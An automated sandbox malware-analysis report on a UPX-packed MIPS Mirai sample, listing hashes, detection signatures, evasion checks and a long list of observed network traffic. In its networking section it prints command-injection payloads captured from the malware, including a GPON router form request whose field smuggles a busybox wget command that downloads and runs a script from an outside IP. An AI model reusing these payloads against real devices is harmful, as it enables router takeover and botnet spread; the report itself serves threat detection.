Linux Analysis Report HCyigyiCAH

Overview

General Information

Sample Name: HCyigyiCAH
Analysis ID: 509945
MD5: 37d47c84691e35296d2eee47a3bb19c3
SHA1: afe47428ba503e1d48d58ca9e63dec079676af01
SHA256: be3c2bbc9ccb07afdb7d40068a1d4ab3911ba6e81eddc72d3e7251fbc09d5aff
Tags: 32, elf, mips, mirai

Detection

Mirai
Score: 72
Range: 0 - 100
Whitelisted: false

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai
Multi AV Scanner detection for submitted file
Sample is packed with UPX
Uses known network protocols on non-standard ports
Sample contains only a LOAD segment without any section mappings
Yara signature match
Uses the "uname" system call to query kernel version information (possible evasion)
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket

Classification

AV Detection:

Multi AV Scanner detection for submitted file
Source: HCyigyiCAH Virustotal: Detection: 20%
Source: HCyigyiCAH ReversingLabs: Detection: 25%

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.23:45976 -> 104.244.72.185:9902
Sample listens on a socket
Source: /tmp/HCyigyiCAH (PID: 5287) Socket: 127.0.0.1::22292
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 33516
Source: unknown Network traffic detected: HTTP traffic on port 47770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 44744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 46828
Source: unknown Network traffic detected: HTTP traffic on port 39550 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 48362 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50662 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 37016 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 40040
Source: unknown Network traffic detected: HTTP traffic on port 50952 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 33746
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53772
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 32898
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54622
Source: unknown Network traffic detected: HTTP traffic on port 44492 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 59314 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59088
Source: unknown Network traffic detected: HTTP traffic on port 39584 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 39148 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 43780
Source: unknown Network traffic detected: HTTP traffic on port 33900 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 34826
Source: unknown Network traffic detected: HTTP traffic on port 58768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 44624
Source: unknown Network traffic detected: HTTP traffic on port 33548 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 45950
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38180
Source: unknown Network traffic detected: HTTP traffic on port 35966 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 36640 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57570 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 33200 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54884
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53794
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53552
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 35900
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50288
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54646
Source: unknown Network traffic detected: HTTP traffic on port 51154 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52472
Source: unknown Network traffic detected: HTTP traffic on port 51578 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 42434
Source: unknown Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 45940
Source: unknown Network traffic detected: HTTP traffic on port 52858 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 41184
Source: unknown Network traffic detected: HTTP traffic on port 51522 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 34674 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55426 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55564 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51006 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 33798
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 35974
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 33796
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 34642
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 33320
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55110
Source: unknown Network traffic detected: HTTP traffic on port 56110 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 33360 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 44206
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 47714
Source: unknown Network traffic detected: HTTP traffic on port 42742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 46622
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 44682
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 44684
Source: unknown Network traffic detected: HTTP traffic on port 34262 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 33548
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 35966
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56444
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56202
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 33786
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 33784
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 35970
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52092
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52098
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54274
Source: unknown Network traffic detected: HTTP traffic on port 54100 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 47944
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 47700
Source: unknown Network traffic detected: HTTP traffic on port 60470 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 37298 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 44624 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 35090 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 33538
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57552
Source: unknown Network traffic detected: HTTP traffic on port 53984 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55370
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54044
Source: unknown Network traffic detected: HTTP traffic on port 55844 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 48236 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 40066
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 42482
Source: unknown Network traffic detected: HTTP traffic on port 32790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50926
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 35940
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59984
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 45508
Source: unknown Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 43740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 52166 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 44658
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60720
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 44492
Source: unknown Network traffic detected: HTTP traffic on port 34148 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52276
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58810
Source: unknown Network traffic detected: HTTP traffic on port 44074 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 44658 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 33360
Source: unknown Network traffic detected: HTTP traffic on port 54122 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 44042 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 43394
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 45572
Source: unknown Network traffic detected: HTTP traffic on port 44508 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53458 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 45064 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58468 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 38708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 36620
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 34676
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 33352
Source: unknown Network traffic detected: HTTP traffic on port 51530 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 52982 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 45566
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 46656
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 43388
Source: unknown Network traffic detected: HTTP traffic on port 35940 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51146 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 43218 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 35858 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 45508 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 38438 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 43386
Source: unknown Network traffic detected: HTTP traffic on port 37554 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 46228 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 35566 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 44460 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55564
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57742
Source: unknown Network traffic detected: HTTP traffic on port 55260 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 38576 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56656
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 34674
Source: unknown Network traffic detected: HTTP traffic on port 43064 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 37934
Source: unknown Network traffic detected: HTTP traffic on port 60050 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 45318
Source: unknown Network traffic detected: HTTP traffic on port 40066 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56038 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 43130
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 44460
Source: unknown Network traffic detected: HTTP traffic on port 34126 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58846
Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 44206 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55110 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 36996 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 38296 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 35984
Source: unknown Network traffic detected: HTTP traffic on port 36708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 34660
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49908
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 48818
Source: unknown Network traffic detected: HTTP traffic on port 60342 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 47966
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown Network traffic detected: HTTP traffic on port 36280 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 42922 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 43080
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 34126
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57254
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57494
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 39818
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58580
Source: unknown Network traffic detected: HTTP traffic on port 38506 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56160
Source: unknown Network traffic detected: HTTP traffic on port 51674 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 37872
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 34116
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50860
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55086
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60664
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38712
Source: unknown Network traffic detected: HTTP traffic on port 34660 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 41264 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 36486 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 34364
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59200
Source: unknown Network traffic detected: HTTP traffic on port 55086 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 38862 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 48996
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 43064
Source: unknown Network traffic detected: HTTP traffic on port 54884 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 47086 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 45002
Source: unknown Network traffic detected: HTTP traffic on port 48652 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 45240
Source: unknown Network traffic detected: HTTP traffic on port 38448 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 36772
Source: HCyigyiCAH, 5287.1.00000000750bc847.00000000b3b30f16.r-x.sdmp String found in binary or memory: http://104.244.72.185/bins/Rakitin.mips%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=10392301
Source: HCyigyiCAH, 5287.1.00000000750bc847.00000000b3b30f16.r-x.sdmp String found in binary or memory: http://104.244.72.185/bins/Rakitin.sh
Source: HCyigyiCAH String found in binary or memory: http://upx.sf.net
Source: unknown HTTP traffic detected: POST /GponForm/diag_Form?style/ HTTP/1.1
User-Agent: Hello, World
Accept: */*
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://104.244.72.185/bins/Rakitin.sh+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0

System Summary:

Sample contains only a LOAD segment without any section mappings
Source: LOAD without section mappings Program segment: 0x100000
Yara signature match
Source: HCyigyiCAH, type: SAMPLE Matched rule: SUSP_ELF_LNX_UPX_Compressed_File date = 2018-12-12, author = Florian Roth, description = Detects a suspicious ELF binary with UPX compression, reference = Internal Research, score = 038ff8b2fef16f8ee9d70e6c219c5f380afe1a21761791e8cbda21fa4d09fdb4
Source: classification engine Classification label: mal72.troj.evad.lin@0/0@0/0
Source: HCyigyiCAH Joe Sandbox Cloud Basic: Detection: clean Score: 0

Data Obfuscation:

Sample is packed with UPX
Source: initial sample String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample String containing UPX found: $Id: UPX 3.94 Copyright (C) 1996-2017 the UPX Team. All Rights Reserved. $

Hooking and other Techniques for Hiding and Protection:

Uses known network protocols on non-standard ports

Malware Analysis System Evasion:

Uses the "uname" system call to query kernel version information (possible evasion)
Source: /tmp/HCyigyiCAH (PID: 5287) Queries kernel information via 'uname'
Source: HCyigyiCAH, 5287.1.000000009f971e6a.0000000014ba5497.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-mips/tmp/HCyigyiCAHSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/HCyigyiCAH
Source: HCyigyiCAH, 5287.1.0000000096cd3abf.00000000313fed4c.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/mips
Source: HCyigyiCAH, 5287.1.000000009f971e6a.0000000014ba5497.rw-.sdmp Binary or memory string: /usr/bin/qemu-mips
Source: HCyigyiCAH, 5287.1.0000000096cd3abf.00000000313fed4c.rw-.sdmp Binary or memory string: V!/etc/qemu-binfmt/mips

Stealing of Sensitive Information:

Yara detected Mirai
Source: Yara match File source: dump.pcap, type: PCAP

Remote Access Functionality:

Yara detected Mirai
Source: Yara match File source: dump.pcap, type: PCAP